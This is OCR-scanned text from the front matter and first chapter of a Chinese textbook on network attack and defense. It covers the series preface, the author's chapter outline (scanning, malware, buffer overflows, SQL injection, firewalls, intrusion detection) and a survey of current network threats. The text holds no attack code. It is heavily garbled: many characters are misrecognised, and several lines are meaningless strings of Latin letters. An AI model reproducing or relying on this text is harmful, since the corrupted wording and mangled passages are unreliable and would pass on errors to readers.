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A 容 简 介 
本 书 涵盖 网 络 攻 防 中 的 常用 方法 ,通过 对 网 络 攻 击 和 网 络 防范 两 方面 技术 的 介绍 (特别 针对 缓冲 区 洲 
出 导致 的 漏洞 和 缓冲 区 溢出 的 内 存 保 护 机 制 做 了 详细 介绍 ) ,帮助 读者 较为 全 面 地 认识 网 络 攻 防 的 本 质 。 
本 书 适 合作 为 高 等 院 校 信息 安全 .网 络 空间 安全 及 计算 机 相关 专业 的 教材 ,也 可 作为 安全 行业 人 门 
者 .安全 领域 研究 人 员 及 软件 开发 工程 师 的 相关 培训 和 自学 教材 。 


本 书 封面 贴 有 清华 大 学 出 版 社 防伪 标签 ,无 标签 者 不 得 销售 。 
版 权 所 有 ,侵权 必 究 。 侵 权 举 报 电话 : M- 13701121933 
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由 于 网 络 应 用 越 来 越 普 及 ,信息 化 的 社会 已 经 呈现 出 越 来 越 广阔 的 前 
景 ,可 以 肯定 地 说 ,在 未 来 的 社会 中 电子 支付 .电子 银行 ,电子 政务 以 及 多 方 
面 的 网 络 信 息 服 务 将 深入 到 人 类 生活 的 方方面面 。 同 时 , 随 之 面临 的 信息 安 
全 问题 也 日 益 突出 ,非法 访问 、 信 息 窃 取 、 甚 至 信息 犯罪 等 恶意 行为 导致 信息 
的 严重 不 安全 。 信 息 安 全 问题 已 由 原来 的 军事 国防 领域 扩展 到 了 整个 社会 ， 
因此 社会 各 界 对 信息 安全 人 才 有 强烈 的 需求 。 

信息 安全 本 科 专 业 是 2000 年 以 来 结合 我 国 特色 开设 的 新 的 本 科 专 业 ， 
是 计算 机 .通信 、 数 学 等 领域 的 交叉 学 科 , 主 要 研究 确保 信息 安全 的 科学 和 技 
术 。 自 专业 创办 以 来 ,各 个 高 校 在 课程 设置 和 教材 研究 上 一 直 处 于 探索 阶 
段 。 但 各 高 校 由 于 本 喘 专 业 设 置 上 来 和 目 于 不 同 的 学 科 , 如 计算 机 、 通 信和 数 
学 等 ,在 课程 设置 上 也 没有 统一 的 指导 规范 ,在 课程 内 容 、 深 浅 程度 和 课程 衔 
接 上 ,存在 模糊 不 清 、 内 容重 赤 、 知 识 履 盖 不 全 面 等 现象 。 因 此 ,根据 信息 安 
全 类 专业 知识 体系 所 覆盖 的 知识 点 ,系统 地 研究 目前 信息 安全 专业 教学 所 涉 
及 的 核心 技术 的 原理 .实践 及 其 应 用 ,合理 规划 信息 安全 专业 的 核心 课程 ,在 
此 基础 上 提出 适合 我 国信 息 安全 专业 教学 和 人 才 培 养 的 核心 课程 的 内 容 框 
架 和 知识 体系 ,并 在 此 基础 上 设计 新 的 教学 模式 和 教学 方法 ,对 进一步 提高 
国内 信息 安全 专业 的 教学 水 平和 质量 具有 重要 的 意义 。 

为 了 进一步 提高 国内 信息 安全 专业 课程 的 教学 水 平和 质量 ,培养 适应 社 
会 经 济 发 展 需要 的 、 兼 具 研究 能 力 和 工程 能 力 的 高 质量 专业 技术 人 才 。 在 教 
育 部 相关 教学 指导 委员 会 专家 的 指导 和 建议 下 ,清华 大 学 出 版 社 与 国内 多 所 
重点 大 学 共同 对 我 国信 息 安全 人 才 培 养 的 课程 框架 和 知识 体系 ,以 及 实践 教 
学 内 容 进 行 了 深入 的 研究 ,并 在 该 基础 上 形成 了 “信息 安全 人 才 需 求 与 专业 
知识 体系 、 课 程 体 系 的 研究 ”等 研究 报告 。 

本 系列 教材 是 在 课程 体系 的 研究 基础 上 总 结 、 完 善 而 成 ,力求 充分 体现 
科学 性 .先进 性 、 工 程 性 ,突出 专业 核心 课程 的 教材 ,兼顾 具有 专业 教学 特点 
的 相关 基础 课程 教材 ,探索 具有 发 展 潜 力 的 选修 课程 教材 ,满足 高 校 多 层次 
教学 的 需要 。 

本 系列 教材 在 规划 过 程 中 体现 了 如 下 一 些 基 本 组 织 原则 和 特点 。 


I 
网络 攻防 原理 及 应 用 


CD. 反映 信息 安全 学 科 的 发 展 和 专业 教育 的 改 军 ,适应 社会 对 信息 安全 人 才 的 培养 需 
求 , 教 材 内 容 坚 持 基 本 理论 的 扎实 和 清晰 ,反映 基 本 理论 和 原理 的 综合 应 用 ,在 其 基础 上 强 
调 工 程 实践 环 呈 ,并 及 时 反映 教学 体系 的 调整 和 教学 内 容 的 时 新。 

(2) 反映 教学 需要 ,促进 教学 发 展 。 教 材 要 适应 多 样 化 的 教学 需要 ,正确 把 握 教 学 内 容 
和 读 程 体系 的 改 半 方向 ,在 选择 教材 内 容 和 编写 体系 时 注意 体现 素质 教育 、 创 新 能 力 与 实战 
能 力 的 堵 乔 ,为 学 生 知 次 能力 .素质 协调 发 展 创造 条 件 。 

(3) 实施 精品 战略 ,突出 重点 。 规 划 教 材 建设 把 重点 放 在 专业 核心 (基础 ) 诬 程 的 教材 
建设 上 ; 特别 注意 选择 并 安排 一 部 分 原来 基础 比较 好 的 优秀 教材 或 讲义 修订 出 版 ,逐步 形 
成 精品 教材 ; 提倡 并 豆 励 编 与 体现 工程 型 和 应 用 型 的 专业 教学 内 容 和 读 程 体系 改革 成 果 的 
教材 。 

(4) 文 持 一 纲 多 本 ,合理 配套 。 专 业 核 心 读 和 相关 基础 读 的 教材 要 配套 ,同一 门 二 程 可 
以 有 多 本 具有 各 自 内 容 特 点 的 教材 。 处 理 好 教材 统一 性 与 多 样 化 ,基本 教材 与 辅助 教材 、 教 
学 参考 书 ,文字 教材 与 软件 教材 的 关系 ,实现 教材 系列 资源 的 配套 。 

(5) 依靠 专家 ,择优 落实 。 在 制定 教材 规划 时 依靠 各 课程 专家 在 调查 研究 本 课程 教材 
建设 现状 的 基础 上 提出 规划 选 题 。 在 落实 主编 人 选 时 ,要 引入 竞 争 机 制 , 通 过 申报 .评审 确 
定 主 编 。 书 称 完 成 后 认真 实行 审 稿 程序 ,确保 出 书 质量 。 

繁 订 教材 出 版 事业 ,提高 教材 质量 的 天 键 是 教师 。 建 立 一 文 高 水 平 的 \ 以 和 老 市 新 的 教材 
编写 队伍 才能 保证 教材 的 编写 质量 ,希望 有 志 于 教材 建设 的 教师 能 够 加 入 到 我 们 的 编写 队 
fh PK. 
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近年 来 , 随 痢 互联 网 络 技术 的 飞速 发 展 , 互 联网 使 用 者 不 约 而 同 地 将 注 
意 力 转向 网 络 安全 领域 。 用 户 在 选择 互联 网 服务 时 将 商家 是 否 能 提供 稳定 
安全 的 服务 纳入 考虑 沁 畴 ,商家 通过 加 客户 提供 安全 的 服务 来 吸引 用 户 。 从 
政府 角度 而 言 , 网 络 空间 安全 已 上 升 到 国家 安全 层面 ,政府 通过 立法 的 手段 
来 保障 网 络 空 间 安全 。 为 提升 国内 网 络 空间 安全 ,需要 大 量 从 业 人 员 加 入 到 
安全 行业 中 。 

如 今 市 场 上 有 大 量 天 于 网 络 攻防 方面 的 书籍 ,其 中 不 乏 经 典 之 作 , 笔 者 
在 阅读 这 些 书籍 的 过 程 中 收获 良 多 。 本 书 以 介绍 网 络 攻 防 技术 为 主 , 通 盖 了 
网 络 攻防 中 第 用 的 方法 ,通过 介绍 网 络 攻击 和 网 络 防范 两 个 角度 的 撤 术 , 帮 
助 读者 较为 全 面 地 认 知 网 络 攻 防 的 本 质 。 笔 者 结合 上 自身 研究 内 容 和 教学 经 
历 , 整 理 编 瑟 此 书 , 布 望 能 为 读 痢 提供 不 同 的 角度 来 认识 网 络 攻 防 的 世界 。 
本 书 对 缓冲 区 浇 出 导致 的 漏洞 和 和 午 对 缓冲 区 浇 出 的 内 存 你 护 机 制 进行 了 详 
细 的 介绍 , 币 望 能 为 漏洞 分 析 、 漏洞 挖掘 .恶意 代码 研究 方向 的 读者 提供 具有 
参考 价值 的 实例 。 


内 容 及 特色 


第 一 部 分 ”网络 攻防 基础 

这 一 部 分 帮助 读者 建立 恨 好 的 理论 基础 ,以 便 读 者 阅读 后 文 内 容 。 在 实 
PAB se FR EHR RE R ne SOR AR EY 
的 ,但 这 些 理论 知识 有 助 于 提升 读者 对 于 网 络 攻防 的 整体 认 知 ,帮助 读者 在 
Ja Se BY Aah eA MAR ANE RAR AN DY FS Fd FR 

第 1 草 分 析 了 当代 了 网络 安全 现状 ,介绍 了 信息 安全 领域 的 问题 和 发 展 
趋势 。 读 者 通过 阅读 本 章 可 对 信息 安全 领域 的 网 络 攻防 方向 有 整体 的 
V AI, 

第 2 章 详 细 介 绍 了 网 络 攻 击 过 程 以 及 网 络 攻 防 模 型 。 深 入 理解 本 部 分 
内 容 有 助 于 读者 建立 学 习 网 络 攻 防 技术 的 知识 框架 ,帮助 读者 在 阅读 后 文 的 
过 程 中 将 细节 知识 点 纳入 整体 知识 框架 中 ,加 深 读 者 对 知识 点 的 记忆 和 
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第 3 章 介 绍 了 漏洞 标准 以 及 漏洞 分 析 方 法 。 漏 洞 是 攻击 者 和 防护 者 在 较量 过 程 中 关注 
的 焦点 。 本 部 分 除了 介绍 通用 的 漏洞 标准 ,还 详细 介绍 了 漏洞 分 析 技 术 漏洞 挖掘 拉 术 、 漏 
洞 利用 技术 。 希 望 有 意愿 深入 学 习 网 络 攻 防 知识 的 读者 对 本 章 进 行 深入 学 习 , 并 按照 本 章 
介绍 动手 实践 。 

第 二 部 分 ”网络 攻击 技术 原理 与 防范 

这 一 部 分 介绍 在 网 络 攻防 世界 中 攻击 者 党 使 用 的 攻击 技术 。 网 络 上 已 存在 许多 功能 完 
备 、 可 供 读者 使 用 的 攻击 工具 ,直接 使 用 攻击 工具 有 助 于 读者 快速 入 门 网 络 攻防 领域 ,因此 
在 本 部 分 的 每 个 章节 中 都 会 介绍 相应 的 攻击 工具 。 为 防止 读者 陷入 “通过 使 用 工具 就 可 以 
实施 网 络 攻 击 ” 的 误区 ,在 每 一 章节 中 还 会 对 实施 攻击 行为 的 原理 进行 深入 的 分 析 , 可 以 让 
谈 者 了 解 到 实现 攻击 工具 的 内 部 底层 原理 。 本 部 分 的 内 容 建立 在 旋 者 对 于 计算 机 网 络 技术 
有 一 定 认 知 的 基础 上 。 本 部 分 中 每 个 章 太 的 内 容 相 对 独立 ,读者 可 选择 感 兴趣 的 章节 阅读 。 

第 4 章 介 绍 了 网 络 攻击 扫描 技术 ,在 网 络 攻击 场景 中 ,搜集 攻击 目标 信息 是 实施 攻击 行 
为 的 重要 环节 之 一 。 读 者 通过 阅读 本 章节 可 以 掌握 攻击 者 搜集 信息 的 方法 、. 过程 以 及 途径 。 

第 5 章 详细 介绍 了 恶意 代码 的 原理 传播 .实现 ,恶意 代码 的 关键 性 技术 以 及 分 析 恶 意 
代码 技术 的 方法 体系 。 本 章 部 分 涉及 对 各 类 恶意 代码 实现 技术 细节 的 分 析 , 仅 适合 于 对 计 
算 机 体系 有 一 定理 解 的 读者 阅读 。 

第 6 章 主 要 介绍 了 攻击 者 针对 用 户口 令 的 攻击 方式 ,并 以 实际 场景 中 的 服务 和 软件 为 
例 列 举 了 几 种 常见 的 口令 破解 工具 。 口 令 攻 击 的 实现 原理 相对 容易 被 读者 理解 ,没有 计算 
机 基础 的 读者 也 可 以 阅读 本 章 内 容 。 

第 7 章 阐 述 了 各 类 网 络 其 骗 攻 击 , 期 骗 攻 击 的 实施 难度 不 高 ,但 产生 的 负面 影响 大 。 理 
解 本 章 内 容 需 要 读者 对 计算 机 网 络 有 有 一定 的 了 解 ,通过 本 章 的 学 习 读者 可 以 采取 技术 手段 
绕 过 攻击 者 的 欺骗 攻击 。 

第 8 章 主 要 介绍 了 缓冲 区 溢出 攻击 的 原理 ,列举 出 针对 不 同 操作 系统 的 典型 缓冲 区 省 
出 攻击 实例 ,并 加 读者 推荐 了 几 类 防范 缓冲 区 溢出 攻击 的 方法 。 读 者 可 以 在 阅读 过 程 中 实 
践 构造 相应 的 缓冲 区 溢出 代码 ,这 有 助 于 读者 深入 理解 缓冲 区 溢出 的 原理 ,加 强 读 者 对 于 程 
序 运 行 时 系统 底层 实现 的 理解 。 

第 9 章 介 绍 了 几 类 典型 的 拒绝 服务 攻击 ,并 分 析 了 其 实现 原理 。 拒 绝 服务 攻击 是 攻击 
者 党 使 用 的 网 络 攻击 手段 之 一 ,本 章 内 容 适 合 对 网 络 协议 有 一 定 了 解 的 读者 学 习 。 

第 10 章 介 绍 了 SQL 注入 攻击 的 原理 ,注入 策略 、 防 范 方法 等 。 本 章 适 合 对 SQL 语言 
一 定 了 解 的 读者 学 习 , 也 适合 于 服务 器 靖 的 开发 人 员 阅 读 , 用 于 增强 服务 器 新 的 数据 安全 。 
建议 在 阅读 过 程 中 配合 实践 ,以 便 在 实际 环境 中 了 解 如 何 实施 SQL 注入 攻击 。 

第 三 部 分 ”网络 攻击 防范 技术 及 应 用 

这 一 部 分 介绍 对 抗 网 络 攻 击 技 术 的 防范 技术 。 信 息 安 全 领域 中 攻击 和 防范 的 联系 是 矛 
与 丑 的 关系 ,通过 不 断 的 攻防 对 抗 来 提升 攻防 技术 。 在 本 书 的 第 二 部 分 介绍 了 大 量 的 网 络 
攻击 技术 ,而 本 部 分 则 着 重 介 绍 对 抗 网 络 攻击 的 防范 措施 ,帮助 读者 了 解 安 全 从 业 人 员 通 过 
哪些 具体 的 策略 实现 对 系统 的 保护 ,进而 对 抗 外 界 的 攻击 。 

第 11 章 主 要 介绍 了 Windows 操作 系统 安全 。 相 较 于 Linux 操作 系统 ,Windows 操作 系 
统 的 安全 增强 功能 封装 性 更 强 , 加 之 Windows 不 是 开源 的 操作 系统 ,用 户 基于 Windows 进 
行 自主 开发 的 空间 较 小 ,因此 本 章 主 要 介绍 了 Windows 系统 已 经 提供 的 安全 防范 功能 , 普 


r 
前 


i AY Windows 用 户 也 可 通过 本 章 的 阅读 对 目 己 所 使 用 的 Windows 系统 进行 安全 增强 。 

第 12 章 介绍 了 Linux 操作 系统 的 安全 防护 体系 。 以 操作 系统 对 于 文件 权限 管理 .用 户 
认证 .恶意 代码 得 杀 .协议 安全 等 几 个 方面 的 安全 加 强 措施 作为 切入 点 ,帮助 读者 了 解 在 对 
系统 进行 防 艺 功能 增强 时 ,应 当 从 哪些 方面 实施 。 本 章 适 合 对 于 Linux 操作 系统 有 一 定 了 
解 的 读者 进行 阅读 。 

第 13 章 主 要 介绍 了 防火 墙 的 原理 及 应 用 。 随 着 人 硬件 设备 互联 度 的 增强 ,设备 间 边 界 逐 
渐 模 糊 , 通 过 划分 区 域 对 设备 进行 安全 隔离 的 技术 已 逐渐 退出 大 众 视野 ,但 防火 墙 技 术 作 
为 一 种 高 级 的 访问 控制 设备 对 区 域内 设备 和 网 络 的 保护 起 到 了 不 容 忽 视 的 作用 。 读 者 
通过 阅读 本 章 可 以 了 解 防火 墙 技术 的 实现 部 署 细 市 ,可 以 将 其 设计 思路 延续 到 其 他 场景 
的 安全 防护 中 。 

第 14 章 主要 介绍 了 入 侵 检 测 的 原理 及 应 用 。 通 过 本 章 的 学 习 ,读者 可 以 了 解 到 攻击 者 
在 绕 过 防火 墙 的 防 沁 后 ,如 何人 遂 过 检测 系统 内 动态 的 信息 来 发 现 攻击 行为 。 入 侵 检测 技术 
有 的 实现 原理 在 当今 互联 的 设备 中 依旧 可 以 延续 使 用 ,达到 保护 系统 整体 安全 有 的 目的 。 

第 15 章 主要 介绍 了 数据 安全 及 应 用 。 数 据 安全 是 系统 防护 的 最 后 保障 ,保证 用 户 在 有 学 
到 攻击 后 可 以 快速 恢复 ,继续 提供 服务 。 为 帮助 读者 理解 数据 安全 实现 的 本 质 , 本 章 还 介绍 
几 类 不 同 的 文件 系统 箔 构 和 数据 恢复 的 基本 原理 。 

第 四 部 分 新 型 网 络 攻击 防范 技术 探索 

这 一 部 分 介绍 了 新 型 的 漏洞 分 析 技 术 , 对 新 型 操作 系统 的 安全 机 制 进行 分 析 。 本 部 分 
内 容 翔 实 , 涉 及 计算 机 底层 知识 ,需要 读者 在 对 计算 机 拷 术 有 较为 深入 理解 的 基础 上 再 进行 
阅读 。 本 部 分 需要 实践 操作 的 内 容 较 多 ,所 以 在 阅读 本 部 分 内 容 时 ,建议 读者 根据 书 中 的 指 
导 进 行 手 动 调试 ,更 有 助 于 增强 理解 。 

第 16 章 介 绍 了 新 型 的 漏洞 分 析 技 术 , 为 了 方便 读者 理解 ,对 应 不 同 漏 洞 分 析 方 法 配合 
了 相关 的 实例 分 析 。 本 章 的 漏洞 分 析 以 MS11 一 010 漏洞 为 例 ,建议 读者 在 了 解 MS11 一 010 
汤 尊 原理 的 基础 上 进行 学 习 。 

第 17 章 介 绍 了 对 于 Windows 7、Windows 8 以 及 Windows 10 系统 的 内 存 保 护 机 制 。 需 
要 读者 对 系统 底层 有 充分 的 了 解 之 后 再 学 习 内 存 保护 机 制 的 内 容 , 对 本 章 内 容 理解 困难 时 
建议 读者 结合 第 8 章 缓 冲 区 浇 出 的 知识 进行 理解 。 
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第 1 章 网 络 安全 现状 .问题 及 其 发 展 
ple 网 络 攻击 过 程 及 攻防 模型 
第 3 章 ”系统 漏洞 分 析 及 相关 标准 


CH AP TER I 


网 络 安全 现状 ,问题 及 其 发 展 第 1 章 


随 着 互联 网 的 发 展 和 IT 技术 的 普及 ,网 络 和 IT 已 经 日 渐 深 入 到 人 们 的 
日 常生 活 和 工作 当中 。 社 会 的 信息 化 和 信息 的 网 络 化 突破 了 应 用 信息 在 时 
间 和 空间 上 的 障碍 ,使 信息 的 价值 不 断 提 高 。 与 此 同时 ,网 页 复 改 .计算 机 病 
BE .系统 非法 入 侵 .数据 泄密 、 网 站 其 骗 、 服务 准 痪 漏洞 的 非法 利用 等 信息 安 
全 事件 时 有 发 生 。 据 2008 年 度 CNCERT/CC 统计 ,我 国有 13 798 个 IP 地 
址 对 应 的 主机 被 木马 程序 秘密 控制 。 据 美国 网 络 应 急 啊 应 小 组 2015 年 发 布 
的 报告 ,2015 年 美国 关键 基础 设施 安全 事件 比 去 年 同比 增长 20%。 目 前, 许 
多 企 事业 单位 的 业务 依赖 于 信息 系统 的 安全 运行 ,信息 安全 的 重要 性 日 益 凸 
qd. feos EIU fs Do Se T ye DL. Sie Y vg RJ 
XEM. EPRE ESA E EB AA BC. EH a A T i] SE DUE BC ES PRU. 
fri E x 4 D. SE Ih AAAS AGRE EE XE VP NCBI as HJ HERE 
问题 。 

在 实际 场景 中 ,多 协议 、 多 系统 、 多 应 用 .多 用 户 组 成 的 网 络 环境 复杂 性 
高 ,存在 痢 难 以 避免 的 安全 脆弱 性 。 脆 弱 性 是 信息 安全 的 潜在 隐患 ,应 对 信 
上 化 网 络 环境 的 安全 脆弱 性 已 成 为 一 个 挑战 性 读 题 。 信 息 化 网 络 环境 从 圭 
闭 走 癌 开放 ,已 经 成 为 由 多 系统 互联 、 多 部 门 合作 、 多 区 域 分 布 . 应 用 种 类 繁 
多 的 综合 大 系统 。 网 络 信 息 环境 的 复杂 性 导致 在 实际 应 用 场景 中 攻击 面 更 
广 , 网 络 安全 防护 的 困难 更 大 。 


1.1 网 络 安全 现状 


1.1.1 当代 网 络 信息 战 关 注 焦 点 


在 新 的 形 努 下 ,信息 安全 与 国家 安全 密切 相关 ， 信 息 战 ”成 为 了 新 的 盏 
事 对 抗 模式 ,计算 机 病毒 和 哇 客 攻击 技术 已 被 视 为 车 事 武 项 。 除 此 之 外 , 建 
设 信息 化 社会 将 会 越 来 越 依赖 于 网 络 环境 的 安全 ,保障 信息 及 网 络 安全 将 成 
为 信息 社会 正常 运转 的 基础 。 伴 随 技术 的 发 展 和 互联 网 的 普及 ,当代 网 络 信 
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奶 战 关注 的 焦点 也 发 生 了 变化 。 

(1) 信息 日 由 与 国家 安全 之 间 的 权衡 日 益 重 要 。 任 何 国家 的 安全 系统 部 无 法 确保 文件 
的 绝对 安全 ,泄密 的 可 能 性 不 断 提高 ,涉及 国家 安全 及 核心 利益 的 绝密 信息 必须 有 效 地 运用 
制度 与 技术 的 手段 进行 积极 地 防御 ,这 些 和 都 将 成 为 各 国政 府 不 得 不 积极 应 对 的 新 挑战 。 

(2) 互联 网 的 开放 性 与 信息 有 效 管 理 之 间 的 冲突 逐渐 加 深 。 互 联网 时 代 信 息 战 争 凸 显 
了 平民 化 .日 由 化 的 特征 。 明 确信 息 控 制 的 范围 和 限度 ,培养 政府 与 妹 体 之 间 民 好 的 互动 天 
系 已 成 为 政府 面临 的 一 大 挑战 。 

(3) 网 络 新 媒体 发 展 与 政府 监管 之 间 的 矛盾 开始 显现 。 信 息 的 来 源 不 再 是 记者 的 退 踊 
与 调查 ,信息 发 布 的 平台 也 绕 过 了 报纸 .电台 和 电视 。 建 立 起 有 效 的 运行 秩序 和 监管 体系 ， 
防止 网 络 成 为 损害 国家 和 个 人 利益 的 平台 是 当前 政府 需要 解决 的 一 大 问题 。 

(4) 信息 安全 技术 与 保密 制度 的 不 均衡 现象 更 为 突出 。 信 息 的 安全 保障 源 于 技术 与 管 
理 制 度 两 个 方面 。 除 了 信息 安全 技术 上 的 狂 洞 ,内 部 人 员 人 往往 是 泄密 的 根源 所 在 。 加 强 信 
上 县 保密 制度 建设 .人 员 管 理 . 责 任 机 制 建立 等 内 容 的 国家 网 络 与 信息 安全 体系 建设 ,对 于 保 
隐 国 家 各 重要 系统 的 安全 .可 控 运 行 意 义 重 大 。 


1.1.2 EX ZR DL BUS ER 


YF LEARY A JE 55 Er HX Pd YE De. f FJ FE 2 Sy xx P 8: H BE 2 Sg Be A H E Io] SC 
MARRE, AP ESC B Dep p Je Ms s: Fr) [n] HE E ER EE DIC A EA fe PRO ah eT f 1H 
的 攻击 表面 也 被 节 展 ,安全 从 业 人 员 抵 抗 网 络 攻击 的 难度 也 明显 提升 了 了 。 网 络 攻 击 的 特点 
也 发 生 了 变化 。 

(1) 拒绝 服务 攻击 频 需 发 生 , 和 人 侵 痢 难以 退 蹊 。 使 用 分 布 式 拒绝 服务 的 攻击 方法 ; A 
用 跳板 发 动 攻击 。 

(2) 攻击 者 需要 的 技术 水 平 逐 渐 降 低 ,手段 更 加 灵活 ,联合 攻击 急剧 增多 。 攻 击 工 具 易 
于 从 网 络 下 载 。 网 络 蠕虫 具有 隐蔽 性 .传染 性 、 艳 坏 性 .日 主攻 击 能 力 。 新 一 代 网 络 蠕 虫 和 
黑客 攻击 计算 机 病毒 之 间 的 界限 越 来 越 模糊 。 

(3) 系统 漏洞 .软件 漏洞 .网 络 漏洞 发 现 加 快 ,攻击 时 间 变 短 ,爆发 时 间 也 变 短 。 在 所 有 
新 攻击 方法 中 ,大 多 数 的 攻击 针对 当年 内 发 现 的 漏洞 。 

(4) 垃圾 邮件 问题 依然 严重 。 垃 圾 邮件 中 不 仅 有 上 碗 无 用 处 的 信息 ,还 有 病毒 和 恶 
代码 。 

O 信息 将 比 以 往 更 有 价值 。 政 府 和 企业 通过 信息 化 ,大 幅 提 高 了 工作 效率 。 各 类 组 
织 的 数据 库 成 了 最 有 价值 的 资产 。 信 息 在 控制 接 入 方面 同样 具有 价值 ,如 签 普 契约 、 用 户 鉴 
定 。 对 于 维护 社会 稳定 、 执 法 工作 中 的 追踪 罪犯 .搜集 证 据 等 方面 也 极 具 价 值 。 

(6) 复 末 性 成 为 最 大 问题 。 系 统 越 复 洒 ,面临 的 安全 人 危险 就 越 大 ,互联 网 为 “有 史 以 来 
最 复杂 的 机 俩 ”。 网 络 安全 拉 术 的 发 展 妈 终 未 能 跟 上 互联 网 前 进 的 步伐 。 网络 安 全 形 努 虽 
然 有 好 转 , 但 是 系统 却 变 得 更 加 复杂 。 


1.1.3 网 络 安 全 威胁 


从 现 有 的 网 络 攻击 案例 中 分 析 , 网 络 安全 威胁 主要 来 源 于 6 个 方面 , 即 基于 浏览 器 揪 
件 、 内 部 攻击 者 、 网 络 间谍 技术 .以 重大 事件 为 诱饵 的 混合 型 攻击 、 无 线 与 移动 安全 ,信息 存 
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储 安全 。 

C1) 针对 网 络 浏 览 器 插件 程序 的 攻击 。 市 面 上 使 用 的 浏览 器 种 类 繁多 ,针对 不 同 浏览 
如 开 发 的 插件 数目 庞大 ,浏览 兹 插件 的 开发 者 分 布 范 围 广 。 一 般 情 况 下 ,插件 程序 的 更 新 与 
浏览 器 更 新 互相 独立 ,插件 程序 的 漏洞 不 随 浏览 旨 的 更 新 而 自动 消失 。 

(2) 内 部 攻击 者 的 威胁 。 随 着 企业 内 部 系统 各 部 门 的 联系 越 来 越 紧 密 ,80% 的 攻击 来 
自 内 部 攻击 。 如 何 实 现在 多 部 门 协作 过 程 中 ,彼此 的 重要 信息 互 不 泄露 ,防止 来 目 企 业内 部 
的 攻击 尤为 重要 。 

(3) 网 络 间 谍 技 术 。 网 络 间 谍 技 术 安 全 威胁 主要 针对 高 价值 的 目标 。 篆 见 的 袭击 是 通 
过 社会 工程 的 方式 进行 渗透 ,如 同 个 人 发 送 邮 件 或 短信 的 方式 实现 。 

(4) 以 重大 事件 为 诱饵 的 混合 型 攻击 。 混 合 型 攻击 安全 威胁 通过 利用 用 户 关 注 点 实现 
攻击 行为 ,如 利用 有 烽 动 性 标题 的 信息 来 诱 使 用 户 打开 恶意 邮件 ,或 者 利用 新 闻 、 电 影 等 制 

(5) 无 线 网 络 ,移动 手机 成 为 新 的 安全 重 灾区 ,消费 者 电子 设备 但 到 攻击 的 可 能 性 增 
大 。 在 无 线 网 络 中 被 传输 的 信息 没有 加 密 或 加 密 很 弱 , 很 容易 被 针 取 、 修 改 和 插入 ,存在 较 
严重 的 安全 泌 洞 。 手 机 病毒 利用 普通 短信 、 彩 信 、 上 网 浏览 .下 载 软件 与 铃声 等 方式 传播 ,还 
将 攻击 范围 扩大 到 移动 网 关 、WAP 服务 硕 或 其 他 网 络 设备 。 越 来 越 多 的 网 络 设备 采用 
USB 标准 进行 连接 ,并 使 用 了 更 多 存储 设备 和 计算 机 外 转产 品 。 

(6) 数据 存储 不 安全 。 智 能 移动 设备 普及 ,用 户 将 大 量 的 数据 存储 放置 到 云端 。 市 来 
了 一 系列 问题 ,如 云 存 储 商 对 用 户 数 据 的 保密 、 对 数据 完整 性 的 保护 ,以 及 防止 数据 破坏 或 
丢失 ,多 用 户 数 据 由 单一 运营 商 集中 存储 。 数 据 存储 运营 商 在 防止 数据 被 其 他 攻击 者 恶性 
攻击 的 同时 , 须 保 证 对 用 户 数 据 的 隐私 性 进行 承 请 ,等 等 。 


1.2 ”网络 安 全 发 展 


1.2.1 网 络 安全 发 展 趋势 


新 技术 、 新 应 用 和 新 服务 带 来 新 的 网 络 安全 风险 。 社 交 网 络 、 智 能 终端 ,移动 设备 ,无线 
网 络 , 云 计 算 等 日 益 为 黑客 们 所 青睐 ,正成 为 网 络 罪犯 繁育 的 沃土 。 各 国 原 有 的 安全 防范 技 
术 和 安全 观念 已 难以 抵御 新 的 网 络 安全 威胁 ,如 人 们 通过 社交 网 络 在 网 络 上 复制 原 有 的 社 
会 关系 。 但 这 种 建立 在 互相 信任 基础 上 的 网 际 关 系 正在 被 黑客 们 利用 为 发 动 “钓鱼 ”攻击 的 
平台 ,如 ”* 云 ? 疹 的 安全 ,海量 数据 和 信息 过 于 集中 ,一旦 遭受 攻击 ,其 后 果 难 以 想 旬 。 

Cd) 关键 基础 设施 、 工 业 控 制 系统 等 渐 成 目标 。 针 对 金融 、 能 源 、 通 信和 交通 等 关键 基 
础 设施 的 大 规模 网 络 攻 击 已 经 出 现 , 纽 约 股 票 交 易 所 、 美 国花 唐 银 行 及 港 交 所 的 系统 先后 被 
黑客 攻破 。 继 2010 年 伊 明 布 舍 尔 核电 站 遭 到 “* 震 网 ?病毒 攻击 后 ,2011 年 美国 伊利 诺 伊 州 
一 家 水 三 的 工业 控制 系统 遭受 黑客 人 侵 ,导致 其 水 录 被 烧毁 并 停止 运作 。 全 球 众 多 事 关 国 
计 民 生 的 能 源 、 交 通 、 水 利 . 电 力 等 重要 行业 均 采 用 类 似 系 统 进 行 生 产 监控 和 管理 ,潜在 威胁 
显而易见 。2011 年 CNVD 收录 了 一 百 多 个 对 我 国 影响 广泛 的 工业 控制 系统 软件 安全 漏 
ili] ,涉及 西门 子 . 北 京 亚 控 和 北京 三 维 力 控 等 国内 外 知名 工业 控制 系统 制造 商 的 产品 。 

(2) 韭 国家 行为 体 的 “网 上 行动 能 力 ” 趋 强 。 日 新 月 异 的 技术 和 网 络 服务 ,赋予 了 个 人 、 
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组 织 和 机 构 更 多 、 更 强 的 获取 收集、 处理 和 存储 信息 、 挖 掘 和 利用 技术 着 洞 .组织 动员 和 宣 
fée isi A E] BEJI ,这 种 威胁 正 逐 潮 从 网 络 走 癌 现 实 。 怒 侯 组 织 也 开始 利用 信息 拉 术 实施 行动 。 
那些 掌握 着 庞大 数据 和 信息 、 控 制 着 关键 网 络 服 务 的 跨国 企业 ,其 行为 也 有 令 人 担心 的 
一 面 。 

(3) 网 络 犯 罪 将 更 为 猩 狐 。 随 着 电子 商务 和 网 上 支付 等 应 用 的 全 面 普及 ,攻击 文 付 通 
握 、 盗 取 交 多 信息 、 抢 村 虚拟 财产 等 犯罪 行为 增多 ,网 络 犯 罪 的 形式 、 手 段 和 后 来 更 加 不 可 预 
测 。 面 对 规模 庞大 的 全 球 黑 客 产 业 链 和 “地 下 经 济 ”, 各 国 经 济 利益 受到 严重 侵蚀 ,国家 的 经 
济 葛 争 力 和 创新 力也 受到 前 弱 。 “黑客 ”了 逐渐 变 成 犯罪 职业 ,并 呈 集 团 化 、 产 业 化 的 发 展 


1.2.2 黑客 发 展 史 


黑客 文化 起 源 于 美国 ,早期 黑客 文化 的 发 展 主要 基于 人 类 对 技术 的 兆 求 ,对 目 由 的 回 
往 。 伴 随 历史 的 发 展 , 越 战 与 反 战 活动 爆发 ,马丁 * 路 德 金 对 于 平等 日 由 的 宣讲 及 嬉 皮 士 文 
